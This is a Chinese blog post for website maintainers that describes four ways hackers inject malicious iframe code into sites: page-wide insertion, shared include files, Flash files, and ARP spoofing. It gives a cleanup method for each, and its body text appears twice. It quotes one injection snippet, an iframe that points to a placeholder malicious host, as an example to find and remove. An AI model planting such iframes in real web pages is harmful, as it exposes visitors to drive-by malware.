网页被插入代码iframe


关键词

网页被插入代码iframe

摘要

现在写网站的人越来越多,难免一些程序员安全水平不过关的。于是做出来的网站就成了黑客的美餐一顿。尤其是那种什么都不懂的小黑客,居然也能黑掉别人网站,让我觉得很郁闷,也很叹息。我在这里列举几种我见过的插入代码的方式,以供大家在维护网站时参考:

1、直接在每个页面加入一句:<iframe src='http://www.xxx.com/mm.htm'></iframe>,遇到这种情况比较讨厌,因为这是一个一点“环保意识”都没有的黑客。恢复的办法是找一个“批量文件替换器”,对网站进行通篇查找,遇到上面那串代码就把它替换成空。
2、在网站的公共包含文件里面插入这句代码:比如说,一个公共的asp头部文件,尾部文件,或者是js脚本文件等都有可能。解决办法就是把它找出来,然后删除它。当然,要把它找出来,得稍微动动脑筋。
3、比较强的一种,把代码放在Flash里面。Flash支持ActionScript,而ActionScript又跟Javascript差不多,Javascript能做的事情,它基本上也能做,所以要插入一句<iframe>是很容易的事情。要找出来可比较难,IE有一个httpwatch插件,它可能跟踪IE载入网页元素的代码,你可以看得到它在载入什么元素的时候出现的<iframe>,如果正好出现<iframe>之前是一个flash,那么恭喜你,就是它了。
4、ARP攻击。关于什么是arp攻击,我就不多说了,唯一提醒一下的是,这种情况下,你的网站可能根本就没有被人改什么,看到iframe代码是因为和你网站服务器同处一个网段的某服务器在攻击你。解决办法是联系相应的网络管理人员。如果你就是该网络的管理人员,那就不用我多说什么了吧,找到“某”,断掉它。

现在写网站的人越来越多,难免一些程序员安全水平不过关的。于是做出来的网站就成了黑客的美餐一顿。尤其是那种什么都不懂的小黑客,居然也能黑掉别人网站,让我觉得很郁闷,也很叹息。我在这里列举几种我见过的插入代码的方式,以供大家在维护网站时参考:

1、直接在每个页面加入一句:<iframe src='http://www.xxx.com/mm.htm'></iframe>,遇到这种情况比较讨厌,因为这是一个一点“环保意识”都没有的黑客。恢复的办法是找一个“批量文件替换器”,对网站进行通篇查找,遇到上面那串代码就把它替换成空。
2、在网站的公共包含文件里面插入这句代码:比如说,一个公共的asp头部文件,尾部文件,或者是js脚本文件等都有可能。解决办法就是把它找出来,然后删除它。当然,要把它找出来,得稍微动动脑筋。
3、比较强的一种,把代码放在Flash里面。Flash支持ActionScript,而ActionScript又跟Javascript差不多,Javascript能做的事情,它基本上也能做,所以要插入一句<iframe>是很容易的事情。要找出来可比较难,IE有一个httpwatch插件,它可能跟踪IE载入网页元素的代码,你可以看得到它在载入什么元素的时候出现的<iframe>,如果正好出现<iframe>之前是一个flash,那么恭喜你,就是它了。
4、ARP攻击。关于什么是arp攻击,我就不多说了,唯一提醒一下的是,这种情况下,你的网站可能根本就没有被人改什么,看到iframe代码是因为和你网站服务器同处一个网段的某服务器在攻击你。解决办法是联系相应的网络管理人员。如果你就是该网络的管理人员,那就不用我多说什么了吧,找到“某”,断掉它。

好了,我见过的基本上就这么多,可能还有别的形式的挂马方式,有机会大家交流一下。

 

要饭二维码

洪哥写文章很苦逼,如果本文对您略有帮助,可以扫描下方二维码支持洪哥!金额随意,先行谢过!大家的支持是我前进的动力!

文章的版权

本文属于“洪哥笔记”原创文章,转载请注明来源地址:网页被插入代码iframe:http://www.splaybow.com/post/insertiframe08450711122007.html

如果您在服务器运维、网络管理、网站或系统开发过程有需要提供收费服务,请加QQ:8771947!十年运维经验,帮您省钱、让您放心!
亲,如果有需要,先存起来,方便以后再看啊!加入收藏夹的话,按Ctrl+D

« JavaScript访问数据库 解决AJAX浏览器后退问题 »

相关文章:

由程序员变成架构师  (2013/5/26 20:37:17)

在Linux中编写C程序代码  (2013/5/10 16:04:49)

解决AJAX浏览器后退问题  (2013/4/6 10:59:48)

网页被插入代码iframe  (2013/4/6 10:59:48)

JavaScript访问数据库  (2013/4/6 10:59:48)